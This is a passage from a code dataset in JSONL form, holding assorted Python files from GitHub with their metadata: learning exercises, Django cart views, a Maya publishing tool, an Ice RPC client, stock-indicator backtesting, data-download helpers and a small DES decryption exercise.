= numbers[start:end]\n break\n elif s > invalid_number:\n break\n if 
weakness:\n break\n\nprint(min(weakness) + max(weakness))\n","repo_name":"Davidyz/learning_python","sub_path":"advent/day9/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"}
+{"seq_id":"74651218134","text":"#To calculate factorial\n\ndef factorial(x):\n #x <= 1 covers 0! = 1, so nPr still works when r equals n\n if x <= 1:\n return 1\n else:\n return (x * factorial(x-1))\n\n\nprint(\"Calculate the number of permutations possible (nPr)\")\n\n#to get the input\n\nn=int(input(\"Total number of objects (n): \"))\nr=int(input(\"Number of objects selected (r): \"))\n\n#to check calculation possible\n\nif n>=r:\n #calculations of permutation\n n_min_r=n-r\n n_fac = factorial(n)\n n_min_r_fac = factorial(n_min_r)\n nPr=int(n_fac/n_min_r_fac)\n print(\"Number of permutations possible (nPr) is\",nPr)\nelse:\n print(\"Number of objects selected cannot be more than Total objects\")\n","repo_name":"CodeMacrocosm/Algo-a-Thon-22","sub_path":"Algos/Python/Permutations calculator.py","file_name":"Permutations calculator.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":36,"dataset":"github-code","pt":"67"}
+{"seq_id":"71380317974","text":"from api import logger\nfrom api.hotel.adapters.priceline.priceline_adapter import PricelineAdapter\nfrom api.hotel.adapters.priceline.priceline_transport import PricelineTransport\nfrom api.hotel.parsers import priceline_loader\nfrom api.models.models import ProviderChain, Provider\n\n\nclass PricelineHotelChainsParser:\n def __init__(self, transport):\n self.transport = transport\n self.provider = Provider.objects.get_or_create(name=PricelineAdapter.get_provider_name())[0]\n\n def execute(self, limit=None, chunk_size=5000):\n total_loaded = 0\n parser_type = PricelineTransport.Endpoint.HOTEL_CHAINS\n priceline_hotel_chains = priceline_loader.load_data(self.transport, parser_type, chunk_size=chunk_size)\n for results in priceline_hotel_chains:\n models = list(map(self.parse_model, results))\n ProviderChain.objects.bulk_create(models)\n\n total_loaded += len(models)\n if limit and total_loaded >= limit:\n logger.info(f\"Limit of {limit} reached. Exiting.\")\n return\n\n def parse_model(self, result):\n provider_code = result[\"chain_id_ppn\"]\n chain_name = result[\"chain_name\"]\n\n return ProviderChain(provider=self.provider, provider_code=provider_code, chain_name=chain_name)\n\n def remove_old_data(self):\n ProviderChain.objects.filter(provider=self.provider).delete()\n","repo_name":"Shing-Ho/sn-api","sub_path":"api/hotel/parsers/priceline_chains_parser.py","file_name":"priceline_chains_parser.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"}
+{"seq_id":"16940882011","text":"import maya.cmds as cmds\nimport pymel.core as pm\n\nfrom . import aniPublisherModels as apMdl\nfrom . import aniPublisherUI as apUI\n\nfrom . 
import utils\n\nreload(apMdl)\nreload(apUI)\nreload(utils)\n\n\nclass AniPublisherCtrl(object):\n def __init__(self):\n self.aniPub = None\n self.aniPubUI = None\n self.settings = utils.getSettings()\n\n self.__validRefNodes = []\n self.__rigRefNodes = []\n\n def showUI(self):\n self.__getValidRefNodes()\n self.__getRigRefNodes()\n\n self.aniPub = apMdl.AniPublisher()\n\n for refNode in self.__rigRefNodes:\n pubItem = apMdl.PublishItem(refNode)\n self.aniPub.addItem(pubItem)\n\n self.aniPubUI = apUI.AniPublisherUI(self.aniPub)\n\n self.aniPubUI.show()\n\n def __getRigRefNodes(self):\n rigRefNodes = []\n\n for refNode in self.__validRefNodes:\n refNamespace = cmds.referenceQuery(refNode, namespace=True)\n if cmds.objExists('{0}:{1}'.format(refNamespace, self.settings['exportSetName'])):\n rigRefNodes.append(refNode)\n\n self.__rigRefNodes = rigRefNodes\n\n def __getValidRefNodes(self):\n validRefNodes = []\n\n refNodes = cmds.ls(type='reference')\n for refNode in refNodes:\n try: # Empty reference node\n cmds.referenceQuery(refNode, filename=True)\n except:\n continue\n\n if not cmds.referenceQuery(refNode, isLoaded=True): # Not loaded refrence node\n continue\n\n validRefNodes.append(refNode)\n\n self.__validRefNodes = validRefNodes\n","repo_name":"LEESANGTAK/takAniPublisher","sub_path":"Contents/scripts/takAniPublisher/aniPublisherCtrl.py","file_name":"aniPublisherCtrl.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"5825282843","text":"import argparse\nimport re\n\nparser = argparse.ArgumentParser(description=\"Scan words from User Input file or specified argument file.\")\nparser.add_argument(\"-i\", \"--infile\", metavar=\"\", help=\"Specify a word File to scan\")\nargs = parser.parse_args()\n\nqp = re.compile(r'^q$|^quit$', re.I)\n\n\ndef count_lines_words(arg1, lcnt):\n with open(arg1, 'r') as wrdfile:\n print(\"Filename to scan is: \" + wrdfile.name, \"\\n\")\n for ln in wrdfile.readlines(): # type: str\n wrds = ln.split()\n print(\"Line\", lcnt, \"has\", len(wrds), \"words\")\n lcnt += 1\n\ndef quitout(qarg, ec):\n if qp.search(qarg):\n print(\"Quiting at users request...\")\n exit(code=ec)\n\nif args.infile:\n INFILE = args.infile\nelse:\n INFILE = input(\"Type in a Filename to scan or (q|Q) to quit: \")\n quitout(INFILE, 1)\n\ncount_lines_words(INFILE, 1)\nprint(\"\")\n\nwhile True:\n sword = input(\"Type in a word to scan in this input file or (q|Q) to quit: \")\n quitout(sword, 0)\n wp = re.compile(r'\\b' + sword + r'\\b', re.I)\n cnt, lary = 1, []\n with open(INFILE, 'r') as file1:\n for l in file1.readlines():\n if wp.search(l):\n lary.append(cnt)\n cnt += 1\n if len(lary) > 0:\n rpwrd = len(lary) - 1\n print(\"Found word:\", sword, \"1st in line:\", lary[0], \"and is repeated again\", rpwrd, \"time(s) in this file.\")\n else:\n print(\"Word \", sword, \"not found in this file.\")\nexit(code=0)\n","repo_name":"anantpbhat/Python","sub_path":"word_scan.py","file_name":"word_scan.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"18979592517","text":"import signal\nimport sys\nimport time\nimport Ice\n\nIce.loadSlice('Fibonacci.ice')\nimport Demo\n\n\ndef run(communicator):\n fibonacci = Demo.FibonacciPrx.uncheckedCast(communicator.propertyToProxy('Fibonacci.Proxy'))\n\n try:\n v = fibonacci.compute(-1)\n assert False\n except Demo.InvalidValue:\n pass # expected\n\n 
print(\"computing fibonacci number 35...\")\n start = time.perf_counter()\n v = fibonacci.compute(35)\n printResult(v, start)\n\n print(\"computing fibonacci number 36...\")\n start = time.perf_counter()\n v = fibonacci.compute(36)\n printResult(v, start)\n\n print(\"retrieving again fibonacci number 35...\")\n start = time.perf_counter()\n v = fibonacci.compute(35)\n printResult(v, start)\n\n print(\"retrieving again fibonacci number 36...\")\n start = time.perf_counter()\n v = fibonacci.compute(36)\n printResult(v, start)\n\n print(\"clearing cache\")\n fibonacci.clearCache()\n\n # We can see from the log timestamps the numbers are indeed computed in parallel.\n print(\"computing fibonacci number 35 and 36 in parallel...\")\n start = time.perf_counter()\n fa = fibonacci.computeAsync(35)\n fb = fibonacci.computeAsync(36)\n va = fa.result()\n vb = fb.result()\n printResult(f\"{va} and {vb}\", start)\n\n print(\"shutting down server\")\n fibonacci.shutdown()\n\n\ndef printResult(result, start):\n print(f\"result is {result}, took {time.perf_counter() - start:.2f}s\")\n\n\n# Ice.initialize returns an initialized Ice communicator, and this the communicator is destroyed once it goes out of\n# scope.\nwith Ice.initialize(sys.argv, \"config.client\") as communicator:\n\n # Install a signal handler to destroy the communicator on Ctrl-C\n signal.signal(signal.SIGINT, lambda signum, handler: communicator.destroy())\n\n # The communicator initialization removes all Ice-related arguments from argv\n if len(sys.argv) > 1:\n print(sys.argv[0] + \": too many arguments\")\n sys.exit(1)\n\n run(communicator)\n","repo_name":"zeroc-ice/ice-demos","sub_path":"python/Ice/coroutine/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1998,"program_lang":"python","lang":"en","doc_type":"code","stars":316,"dataset":"github-code","pt":"67"} +{"seq_id":"28243543713","text":"from django.shortcuts import render\nfrom django.views.generic import View\nfrom django.http import JsonResponse\nfrom goods.models import GoodsSKU\nfrom django_redis import get_redis_connection\nimport json\n\n\n# Create your views here.\n\n\nclass DeleteCartView(View):\n \"\"\"删除购物车记录:一次删除一条\"\"\"\n\n def post(self, request):\n\n # 接收参数:sku_id\n sku_id = request.POST.get('sku_id')\n\n # 校验参数:not,判断是否为空\n if not sku_id:\n return JsonResponse({'code':1, 'message':'sku_id为空'})\n\n # 判断sku_id是否合法\n try:\n sku = GoodsSKU.objects.get(id=sku_id)\n except GoodsSKU.DoesNotExist:\n return JsonResponse({'code':2, 'message':'要删除的商品不存在'})\n\n # 判断用户是否登录\n if request.user.is_authenticated():\n # 如果用户登陆,删除redis中购物车数据\n redis_conn = get_redis_connection('default')\n user_id = request.user.id\n redis_conn.hdel('cart_%s' % user_id, sku_id)\n\n else:\n # 如果用户未登陆,删除cookie中购物车数据\n cart_json = request.COOKIES.get('cart')\n if cart_json is not None:\n cart_dict = json.loads(cart_json)\n\n # 删除字典中某个key及对应的内容\n del cart_dict[sku_id]\n\n # 将最新的cart_dict,转成json字符串\n new_cart_json = json.dumps(cart_dict)\n\n # 删除结果写入cookie\n response = JsonResponse({'code': 0, 'message': '删除成功'})\n response.set_cookie('cart', new_cart_json)\n\n return response\n\n return JsonResponse({'code': 0, 'message': '删除成功'})\n\n\nclass UpdateCartView(View):\n \"\"\"更新购物车信息\"\"\"\n\n def post(self, request):\n \"\"\"+ - 手动输入\"\"\"\n\n # 获取参数:sku_id, count\n sku_id = request.POST.get('sku_id')\n count = request.POST.get('count')\n\n # 校验参数all()\n if not all([sku_id, count]):\n return JsonResponse({'code': 1, 'message':'缺少参数'})\n\n # 判断商品是否存在\n try:\n sku = 
GoodsSKU.objects.get(id=sku_id)\n except GoodsSKU.DoesNotExist:\n return JsonResponse({'code': 2, 'message': '商品不存在'})\n\n # 判断count是否是整数\n try:\n count = int(count)\n except Exception:\n return JsonResponse({'code': 3, 'message': '商品数量错误'})\n\n # 判断库存\n if count > sku.stock:\n return JsonResponse({'code': 4, 'message': '库存不足'})\n\n # 判断用户是否登陆\n if request.user.is_authenticated():\n # 如果用户登陆,将修改的购物车数据存储到redis中\n redis_conn = get_redis_connection('default')\n user_id = request.user.id\n\n # 因为我们设计的接口是幂等的风格.传入的count就是用户最后要记录的商品的数量\n redis_conn.hset('cart_%s' % user_id, sku_id, count)\n\n return JsonResponse({'code': 0, 'message': '更新购物车成功'})\n else:\n # 如果用户未登陆,将修改的购物车数据存储到cookie中\n cart_json = request.COOKIES.get('cart')\n if cart_json is not None:\n cart_dict = json.loads(cart_json)\n else:\n cart_dict = {}\n\n # 因为我们设计的接口是幂等的风格.传入的count就是用户最后要记录的商品的数量\n cart_dict[sku_id] = count\n\n # 把cart_dict转成最新的json字符串\n new_cart_json = json.dumps(cart_dict)\n\n # 更新cookie中的购物车信息\n response = JsonResponse({'code': 0, 'message': '更新购物车成功'})\n response.set_cookie('cart', new_cart_json)\n\n return response\n\n\nclass CartInfoView(View):\n \"\"\"购物车信息\"\"\"\n\n def get(self, request):\n \"\"\"登录和未登录时查询购物车数据,并渲染\"\"\"\n\n if request.user.is_authenticated():\n # 用户已登录时,查询redis中购物车数据\n redis_conn = get_redis_connection('default')\n user_id = request.user.id\n # 如果字典是通过redis_conn.hgetall()得到的,那么字典的key和value信息都是bytes类型\n cart_dict = redis_conn.hgetall('cart_%s' % user_id)\n else:\n # 用户未登录时,查询cookie中的购物车数据\n cart_json = request.COOKIES.get('cart')\n if cart_json is not None:\n # 如果cart_dict字典从cookie中得到的,那么key是字符串,value是int\n cart_dict = json.loads(cart_json)\n else:\n cart_dict = {}\n\n # 定义临时变量\n skus = []\n total_count = 0\n total_sku_amount = 0\n\n # cart_dict = {sku_id1:count1, sku_id2:count2}\n for sku_id, count in cart_dict.items():\n\n try:\n sku = GoodsSKU.objects.get(id=sku_id)\n except GoodsSKU.DoesNotExist:\n continue # 有异常,跳过.展示没有异常的数据\n\n # 统一count的数据类型为int,方便后续代码的计算和比较\n count = int(count)\n # 小计\n amount = count * sku.price\n\n # 提示:python是动态的面向对象的语言,所以可以动态的给sku对象添加属性,存储count和amount\n sku.count = count\n sku.amount = amount\n # 记录sku\n skus.append(sku)\n\n # 总金额和总计\n total_sku_amount += amount\n total_count += count\n\n # 构造上下文\n context = {\n 'skus':skus,\n 'total_sku_amount':total_sku_amount,\n 'total_count':total_count\n }\n\n # 渲染模板\n return render(request, 'cart.html', context)\n\n\nclass AddCartView(View):\n \"\"\"添加到购物车\"\"\"\n\n def post(self, request):\n \"\"\"接受购物车参数,校验购物车参数,保存购物车参数\"\"\"\n\n # 判断用户是否登录\n # if not request.user.is_authenticated():\n # return JsonResponse({'code':1, 'message':'用户未登录'})\n\n # 接受购物车参数 : sku_id, count\n sku_id = request.POST.get('sku_id')\n count = request.POST.get('count')\n\n # 校验参数 : all()\n if not all([sku_id, count]):\n return JsonResponse({'code':2, 'message':'缺少参数'})\n\n # 判断sku_id是否合法\n try:\n sku = GoodsSKU.objects.get(id=sku_id)\n except GoodsSKU.DoesNotExist:\n return JsonResponse({'code':3, 'message': '商品不存在'})\n\n # 判断count是否合法\n try:\n count = int(count)\n except Exception:\n return JsonResponse({'code':4, 'message': '商品数量错误'})\n\n # 判断库存是否超出\n if count > sku.stock:\n return JsonResponse({'code':5, 'message': '库存不足'})\n\n if request.user.is_authenticated():\n\n # 获取user_id\n user_id = request.user.id\n\n # 保存购物车数据到Redis\n redis_conn = get_redis_connection('default')\n # 需要查询要保存到购物车的商品数据是否存在,如果存在,需要累加,反之,赋新值\n origin_count = redis_conn.hget('cart_%s' % user_id, sku_id)\n if origin_count is not None:\n count += int(origin_count) # 
django_redis保存的hash类型的数据是bytes类型的\n\n # 再次:判断库存是否超出,拿着最终的结果和库存比较\n if count > sku.stock:\n return JsonResponse({'code': 5, 'message': '库存不足'})\n\n redis_conn.hset('cart_%s' % user_id, sku_id, count)\n\n # 查询购物车中的商品数量,响应给前端\n cart_num = 0\n cart_dict = redis_conn.hgetall('cart_%s' % user_id)\n for val in cart_dict.values():\n cart_num += int(val)\n\n # 响应结果\n return JsonResponse({'code':0, 'message': '添加购物车成功', 'cart_num':cart_num})\n else:\n # 用户未登录,保存购物车数据到cookie {sku_id:count}\n # 读取cookie中的购物车数据\n cart_json = request.COOKIES.get('cart')\n if cart_json is not None:\n # 把cart_json转成字典 : loads 将json字符串转成json字典\n cart_dict = json.loads(cart_json)\n else:\n cart_dict = {} # 为了后面继续很方便的操作购物车数据,这里定义空的字典对象\n\n # 判断要存储的商品信息,是否已经存在.如果已经存在就累加.反之,赋新值\n # 提醒 : 需要保证 sku_id和cart_dict里面的key的类型一致;此处的正好一致\n if sku_id in cart_dict:\n origin_count = cart_dict[sku_id] # origin_count : 在json模块中,数据类型不变\n count += origin_count\n\n # 再再次:判断库存是否超出,拿着最终的结果和库存比较\n if count > sku.stock:\n return JsonResponse({'code': 5, 'message': '库存不足'})\n\n # 把最新的商品的数量,赋值保存到购物车字典\n cart_dict[sku_id] = count\n\n # 在写入cookie之前,将cart_dict转成json字符串\n new_cart_json = json.dumps(cart_dict)\n\n # 为了方便前端展示最新的购物车数量,后端添加购物车成功后,需要查询购物车\n cart_num = 0\n for val in cart_dict.values():\n cart_num += val # val 是json模块运作的,存储的市数字,读取的也是数字\n\n # 创建response\n response = JsonResponse({'code':0, 'message':'添加购物车成功', 'cart_num':cart_num})\n\n # 写入cookie\n response.set_cookie('cart', new_cart_json)\n\n return response\n","repo_name":"zxallen/Django_T","sub_path":"apps/cart/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10217,"program_lang":"python","lang":"zh","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"12957467998","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 16 11:40:16 2018\n\n@author: Brenda\n\"\"\"\n\nimport pandas\nimport numpy\nimport statsmodels.api as sm\nimport statsmodels.formula.api as smf\n\n#load dataset from the csv file in the dataframe called nesarc_data\ngapminder_data = pandas.read_csv('gapminder.csv',low_memory=False)\n\n#set PANDAS to show all columns in Data frame\npandas.set_option('display.max_columns', None)\n\n#set PANDAS to show all rows in Data frame\npandas.set_option('display.max_rows', None)\n\n#replace blanks with Nan\ngapminder_data['internetuserate']=gapminder_data['internetuserate'].replace(\" \", numpy.NaN)\ngapminder_data['urbanrate']=gapminder_data['urbanrate'].replace(\" \", numpy.NaN)\n\n\n#numeric variables that are read into python from the csv file as strings (objects)\n#with empty cells should be converted back to numeric format using convert_objects function\ngapminder_data['internetuserate'] = pandas.to_numeric(gapminder_data['internetuserate'])\ngapminder_data['urbanrate'] = pandas.to_numeric(gapminder_data['urbanrate'])\n\n\n#regression for association between urbandrate (explanatory, numerical) and internet use rate (response, numerical)\nprint('OLS regression model for the association between urbanrate and internet use rate')\nreg1 = smf.ols('internetuserate ~ urbanrate',data=gapminder_data).fit()\nprint(reg1.summary())\n\n\n\n\n\n\n","repo_name":"BusinessAnalyticsWIT/BA2-2019","sub_path":"topic-05-Regression-Clustering/book-a/archives/lab07.py","file_name":"lab07.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"13792618992","text":"import logging\nimport os\nimport urllib.request\nimport zipfile\n\nimport pandas as pd\nfrom tqdm 
import tqdm\n\nlogging.basicConfig(level=logging.INFO)\n\n\nclass DownloadProgressbar(tqdm):\n def update_to(self, block=1, block_size=1, total_size=None):\n if total_size is not None:\n self.total = total_size\n self.update(block * block_size - self.n)\n\n\ndef download_raw_data(url: str, output_path: str):\n with DownloadProgressbar(unit=\"B\", unit_scale=True, miniters=1, desc=output_path) as t_bar:\n urllib.request.urlretrieve(url, filename=output_path, reporthook=t_bar.update_to)\n\n\ndef open_raw_data(path_to_data: str, exp_type: str, exp_id: int, user_id: int) -> pd.DataFrame:\n filename = f\"{exp_type}_exp{exp_id:02d}_user{user_id:02d}.txt\"\n filedir = os.path.join(path_to_data, \"RawData\", filename)\n activity = pd.read_csv(filedir, sep=\" \", header=None, names=[\"x\", \"y\", \"z\"])\n return activity\n\n\ndef setup_raw_data(url: str, path_to_data: str, file_name: str = \"RawData\"):\n if os.path.isdir(path_to_data):\n # \"RawData\" is extracted as a directory, so isdir (not isfile) is the right existence check\n if os.path.isdir(f\"{path_to_data}/{file_name}\"):\n logging.info(\"Found the correct data.\")\n return\n else:\n logging.info(\n \"Data folder found, but it does not contain the right data. Downloading...\"\n )\n else:\n logging.info(\"Data folder not found. Downloading...\")\n print(\"Data not found. Downloading...\")\n\n os.makedirs(path_to_data, exist_ok=True)\n # Download raw data\n output_file = url.split(\"/\")[-1]\n output_file_path = os.path.join(path_to_data, output_file)\n download_raw_data(url, output_file_path)\n # Unzip raw data\n if zipfile.is_zipfile(output_file_path):\n with zipfile.ZipFile(output_file_path, \"r\") as zip_ref:\n zip_ref.extractall(path_to_data)\n\n # Check if all files are present\n req_files = [file_name]\n logging.info(\"Checking if all files are present...\")\n found_files = [_dir for _dir in os.listdir(path_to_data) if _dir in req_files]\n if len(found_files) == len(req_files):\n logging.info(\"All files are present\")\n # Remove zip file\n if zipfile.is_zipfile(output_file_path):\n os.remove(output_file_path)\n else:\n raise FileNotFoundError(\n \"Something went wrong. Please extract the zip file manually. 
\"\n f\"Your '{path_to_data}'-folder should contain the following files: {req_files}\"\n )\n\n\ndef main():\n return ()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"JaNoNi/MADS-MMS-Exam2","sub_path":"helper_functions/data_manipulation.py","file_name":"data_manipulation.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"32961150109","text":"# -- coding: utf-8 --\n# @Time : 2022/3/5 19:29\n# @Author : zhuo.wang\n# @File : sub_ris.py\nimport datetime\nimport os\nfrom multiprocessing import Pool\nimport warnings\nwarnings.filterwarnings('ignore')\nimport pandas as pd\n\nfrom tqdm import tqdm\nimport talib as ta\n\ninterval = 5\nmin_slope = 0.58\nmin_rsi_value = 42\nwidth = 30 / 50 * 60\nmin_rsi_window = 30\n\nclass Trading:\n\n def __init__(self,money=90000):\n self.money = money\n self.local_money = money\n self.end_date = None\n self.use_day = 0\n\n @classmethod\n def add_rsi(self,data):\n for freq in [6, 12, 24]:\n data[f\"rsi_{freq}\"] = ta.RSI(data.close, freq)\n return data\n\n def get_slope(self,data):\n return ((data - data.shift(-interval)) / width).shift(interval).iloc[-1]\n\n def get_next_p_change(self,item,date, n=1):\n n = n + 1\n s = item.loc[date:].iloc[n]\n self.end_date = s.date\n return s.p_change / 100\n\n def get_next_date(self,item,date, n=1):\n return item.loc[date:].iloc[n].date\n\n def sub_money(self,buy_money, p_change):\n buy_money *= (1 + p_change)\n buy_money += self.local_money * (1 / 3)\n self.money -= self.local_money * (1 / 3)\n return buy_money\n\n def get_min_difference(self,data, tolerance):\n max_reduce = data.max()\n current_value = data.iloc[-1]\n if current_value >= max_reduce * tolerance:\n return True\n return False\n\n def double_sell(self,item,buy_money, date, n=3):\n profit = buy_money * 0.5\n buy_money -= profit\n profit += buy_money * (1 + self.get_next_p_change(item,date, n))\n self.money += profit\n\n def get_min_rsi(self,data):\n min_rsi = data.min()\n current_value = data.iloc[-1]\n return (current_value - min_rsi) / current_value <= 0.10 and current_value < 38\n\n def get_profit(self,date,item,symbol):\n self.use_day = 0\n self.end_date = date\n buy_money = self.money * (1 / 3)\n self.money -= buy_money\n p_change = self.get_next_p_change(item, date, 1)\n\n if p_change > 0:\n buy_money *= (1 + p_change)\n # self.double_sell(item, buy_money, date, n=2)\n\n buy_money *= (1 + self.get_next_p_change(item,date,n=2))\n self.money += buy_money\n\n self.use_day += 2\n else:\n buy_money = self.sub_money(buy_money, p_change)\n p_change = self.get_next_p_change(item, date, 2)\n self.use_day += 1\n if p_change > 0:\n buy_money *= (1 + p_change)\n self.double_sell(item, buy_money, date, n=3)\n self.use_day += 2\n else:\n buy_money = self.sub_money(buy_money, p_change)\n buy_money *= (1 + self.get_next_p_change(item, date, n=3))\n self.double_sell(item, buy_money, date, n=4)\n self.use_day += 2\n profit = self.money - self.local_money\n ratio = profit / buy_money\n self.money = self.local_money\n return [symbol,date, profit,ratio,buy_money,self.use_day, self.end_date]\n\n @classmethod\n def load_stock(cls):\n file_path = os.path.join(BASE_DIR, 'results', f'{datetime.datetime.now().date()}_sub_rsi_stock_data.pkl')\n if os.path.exists(file_path):\n return pd.read_pickle(file_path)\n df = load_df()\n df = df.groupby('symbol').apply(lambda x: Trading.add_rsi(x)).reset_index(drop=True)\n stock = df[['name', 'date', 'ts_code', 'symbol', 'open', 
'close', 'high', 'low', 'rsi_6', 'rsi_12', 'rsi_24',\n 'p_change']]\n stock = stock.groupby('symbol').apply(lambda x: x.assign(reduce=x['rsi_24'] - x['rsi_6'])).reset_index(\n drop=True)\n stock.to_pickle(file_path)\n return stock\n\n @classmethod\n def save(cls,result,latest_result):\n total = pd.DataFrame(result, columns=['symbol', 'date', 'profit','ratio','buy_money','use_day', 'end_date'])\n total.to_pickle(os.path.join(BASE_DIR, 'results', 'sub_ris.pkl'))\n if latest_result:\n pd.DataFrame(latest_result, columns=['symbol', 'date']).to_pickle(\n os.path.join(BASE_DIR, 'results', 'sub_rsi_latest.pkl'))\n print(total)\n print(total.profit.mean())\n\n def run(self,symbol,item,min_rsi):\n item.dropna(subset=['reduce'], inplace=True)\n item.set_index('date', inplace=True, drop=False)\n item['max_diff_60'] = item.reduce.rolling(window=60).apply(self.get_min_difference, args=(1,))\n item['max_diff_45'] = item.reduce.rolling(window=45).apply(self.get_min_difference, args=(1,))\n item['max_diff_30'] = item.reduce.rolling(window=30).apply(self.get_min_difference, args=(1,))\n item['is_min_rsi'] = item.rsi_6.rolling(window=min_rsi_window).apply(self.get_min_rsi)\n item['max_reduce'] = (item['max_diff_60'] + item['max_diff_45'] + item['max_diff_30']) >= 2\n item['slope'] = self.get_slope(item.rsi_6)\n profits = []\n latest_list = []\n condition = (item.max_reduce)\n if min_rsi:\n condition &= (item.is_min_rsi)\n for date in item.loc[condition,'date']:\n # if self.get_slope(item.loc[item.date<=date,'rsi_6']) >= min_slope:\n # continue\n if item.loc[item.date==date,'rsi_6'].iloc[0] > min_rsi_value:\n continue\n if date == item.date.max():\n latest_list.append([symbol,date])\n if profits and date <= profits[-1][-1]:\n continue\n try:\n profits.append(self.get_profit(date,item,symbol))\n except IndexError:\n self.money = self.local_money\n continue\n\n return profits,latest_list\n\n\nif __name__ == '__main__':\n from common.utils import load_df, BASE_DIR\n stock = Trading.load_stock()\n t = tqdm(range(len(stock.symbol.unique())), ncols=80)\n pool = Pool(4)\n jobs = []\n result = []\n latest_result = []\n min_rsi = False\n for symbol,item in stock.groupby('symbol'):\n # for symbol, item in stock.query(\"symbol=='300393.SZ'\").groupby('symbol'):\n obj = Trading(money=90000)\n jobs.append(pool.apply_async(obj.run,args=(symbol,item,min_rsi)))\n for job in jobs:\n winner,latest_list = job.get()\n if winner:\n result.extend(winner)\n latest_result.extend(latest_list)\n t.update(1)\n Trading.save(result,latest_result)\n","repo_name":"tosmart01/stock","sub_path":"models/sub_rsi.py","file_name":"sub_rsi.py","file_ext":"py","file_size_in_byte":6537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"44768598449","text":"import json\r\nwith open(r'./static/2018.json', \"r\", encoding=\"utf-8\") as f:\r\n json_data = json.load(f)\r\n list1= []\r\n new_key = \"log\"\r\n a = \"lon\"\r\n b = \"O3\"\r\n C = \"F\"\r\n new = \"size\"\r\n for i in json_data:\r\n i[new_key] = i.pop(a)\r\n i[new] = i.pop(b)\r\n i.pop(\"PM2.5\")\r\n i.pop(\"PM10\")\r\n i.pop(\"SO2\")\r\n i.pop(\"NO2\")\r\n i.pop(\"CO\")\r\n #i.pop(\"O3\")\r\n i[\"group\"] = C\r\n i.pop(\"RH\")\r\n i.pop(\"TEMP\")\r\n i.pop(\"PSFC\")\r\n i.pop(\"year\")\r\n list1.append(i)\r\nwith open(r'./China1.json', \"w\", encoding=\"UTF-8\") as e:\r\n json_new_data = json.dumps(list1, ensure_ascii=False, indent=4)\r\n e.write(json_new_data)\r\n\r\n 
print(json_new_data)","repo_name":"ColinZzc/AirPollutionVis","sub_path":"ChinaVisProject/dealwithjson.py","file_name":"dealwithjson.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"5026099836","text":"import base64\r\nfrom Crypto.Cipher import DES\r\nfrom Crypto.Util.Padding import pad, unpad\r\ndef decrypt (ciphertext, key):\r\n cipher = DES.new(key, DES.MODE_ECB)\r\n plaintext = cipher.decrypt(ciphertext)\r\n #plaintext = unpad(plaintext, DES.block_size)\r\n return plaintext\r\n\r\n\r\nciphertext_b64 = \"6MupHn98v/yhX3jSCMf+LFOVQc7iRLALzTjd5ow34a5vnoPkSmZ1MHG/wU9Elkva\"\r\nciphertext_byte = base64.b64decode(ciphertext_b64)\r\nprint(ciphertext_byte)\r\n\r\nkey_hex = \"E001E001F101F101\"\r\nkey_b = bytes.fromhex(key_hex)\r\nprint(key_b)\r\nplaintext = decrypt(ciphertext_byte, key_b)\r\nprint(\"Decrypted plaintext:\", plaintext.decode('utf-8'))\r\n","repo_name":"minendie/Lab6_NT219","sub_path":"des.py","file_name":"des.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"30430161321","text":"from __future__ import division\nfrom __future__ import print_function\nimport numpy\n\nt_size = 5\nf_size = t_size\nr_size = t_size\nc_size = t_size\ndata3d = numpy.arange(f_size * r_size * c_size, dtype=int).reshape(\n f_size, r_size, c_size\n)\n#\n# print data3d\n# for f in range(f_size):\n# for r in range(r_size):\n# for c in range(c_size):\n# print 'data3d[', f, ',', r, ',', c, '] =', data3d[f, r, c]\n#\ndata = []\ncont = 0\nfor f in range(f_size):\n for r in range(r_size):\n for c in range(c_size):\n data.append((f, r, c, cont**2))\n cont += 1\n\nprint(\"data =\", data)\n# f_tot = 0.0\n# r_tot = 0.0\n# c_tot = 0.0\n# d_tot = 0.0\n#\ncont = 0\nfor f, r, c, d in data:\n print(cont)\n # print 'data3d[', f, ',', r, ',', c, '] =', data[f, r, c]\n print(f, c, r, d)\n cont += 1\n# f_tot += d * f\n# r_tot += d * r\n# c_tot += d * c\n# d_tot += d\n\n# for f in range(f_size):\n# for r in range(r_size):\n# for c in range(c_size):\n# data3d.append((f, r, c, 0))\n\n\n# for f, r, c, d in data3d:\n# print 'data3d[', f, ',', r, ',', c, '] =', d\n","repo_name":"dials/dials_scratch","sub_path":"luiso_s/test_code/tst_loops.py","file_name":"tst_loops.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"35624032080","text":"from typing import ValuesView\nfrom utils.day_base import DayBase\nfrom utils.data_input import input_generator\n\n\nclass Run_2021_04(DayBase):\n YEAR = \"2021\"\n DAY = \"04\"\n\n\nclass Board:\n # assume square\n board_size = 5\n\n def __init__(self, lines):\n self.entries = []\n self.col_hit = []\n self.row_hit = []\n self.unhit_total = 0\n self.done = False\n for line in lines:\n words = line.split()\n entry = []\n for word in words:\n val = int(word)\n 